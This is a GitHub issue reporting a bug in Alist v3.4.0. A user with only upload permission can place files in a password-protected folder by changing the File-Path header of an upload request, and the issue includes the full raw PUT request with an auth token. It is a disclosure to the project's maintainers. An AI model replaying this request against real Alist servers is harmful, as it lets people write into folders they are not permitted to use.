Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Upload files to the directory with password Vulnerability(bypass) #2444

Closed
4 tasks done
Shydlock opened this issue Nov 22, 2022 · 1 comment
Closed
4 tasks done
Labels
bug Something isn't working

Comments

@Shydlock
Copy link

Please make sure of the following things

  • I have read the documentation.
  • I'm sure there are no duplicate issues or discussions.
  • I'm sure it's due to alist and not something else(such as Dependencies or Operational).
  • I'm sure I'm using the latest version

Alist Version / Alist 版本

v3.4.0

Driver used / 使用的存储驱动

Local

Describe the bug / 问题描述

  • A user with only file upload permission can upload any file to any folder (even a password protected one)

Reproduction:

  • Login as a user who only have the right to upload file

image

  • You can see that the /testPasswd folder is password protected

image

  • Go to another folder /test (not protected by password), click on file upload to select the uploaded file and grab the package

image

image

![image](https://user-images.githubusercontent.com/52377340/203211925-7ac5b6b8-78e4-4981-bf06-9452fa653e5f.png)
  • Modify the File-Path in the packet to the specified directory (take /testPasswd as an example) and send the packet
    image

  • Enter the password into the folder to find the file uploaded successfully

image

Reproduction / 复现链接

Package:

PUT /api/fs/put HTTP/1.1
Host: 192.168.31.148:52000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.31.148:52000/test
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJleHAiOjE2NjkyNTkxMjksIm5iZiI6MTY2OTA4NjMyOSwiaWF0IjoxNjY5MDg2MzI5fQ.h3RncP5nufF43YURW74yQJYbWhnhIO5SqjTFl7UUXk4
Content-Type: application/octet-stream
File-Path: %2ftestPasswd%2fYZ68QYZdPcaXKdgE3
As-Task: false
Content-Length: 55875
Origin: http://192.168.31.148:52000
Connection: close

�PNG

Logs / 日志

No response

@Shydlock Shydlock added the bug Something isn't working label Nov 22, 2022
@welcome
Copy link

welcome bot commented Nov 22, 2022

Thanks for opening your first issue here! Be sure to follow the issue template!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

No branches or pull requests

1 participant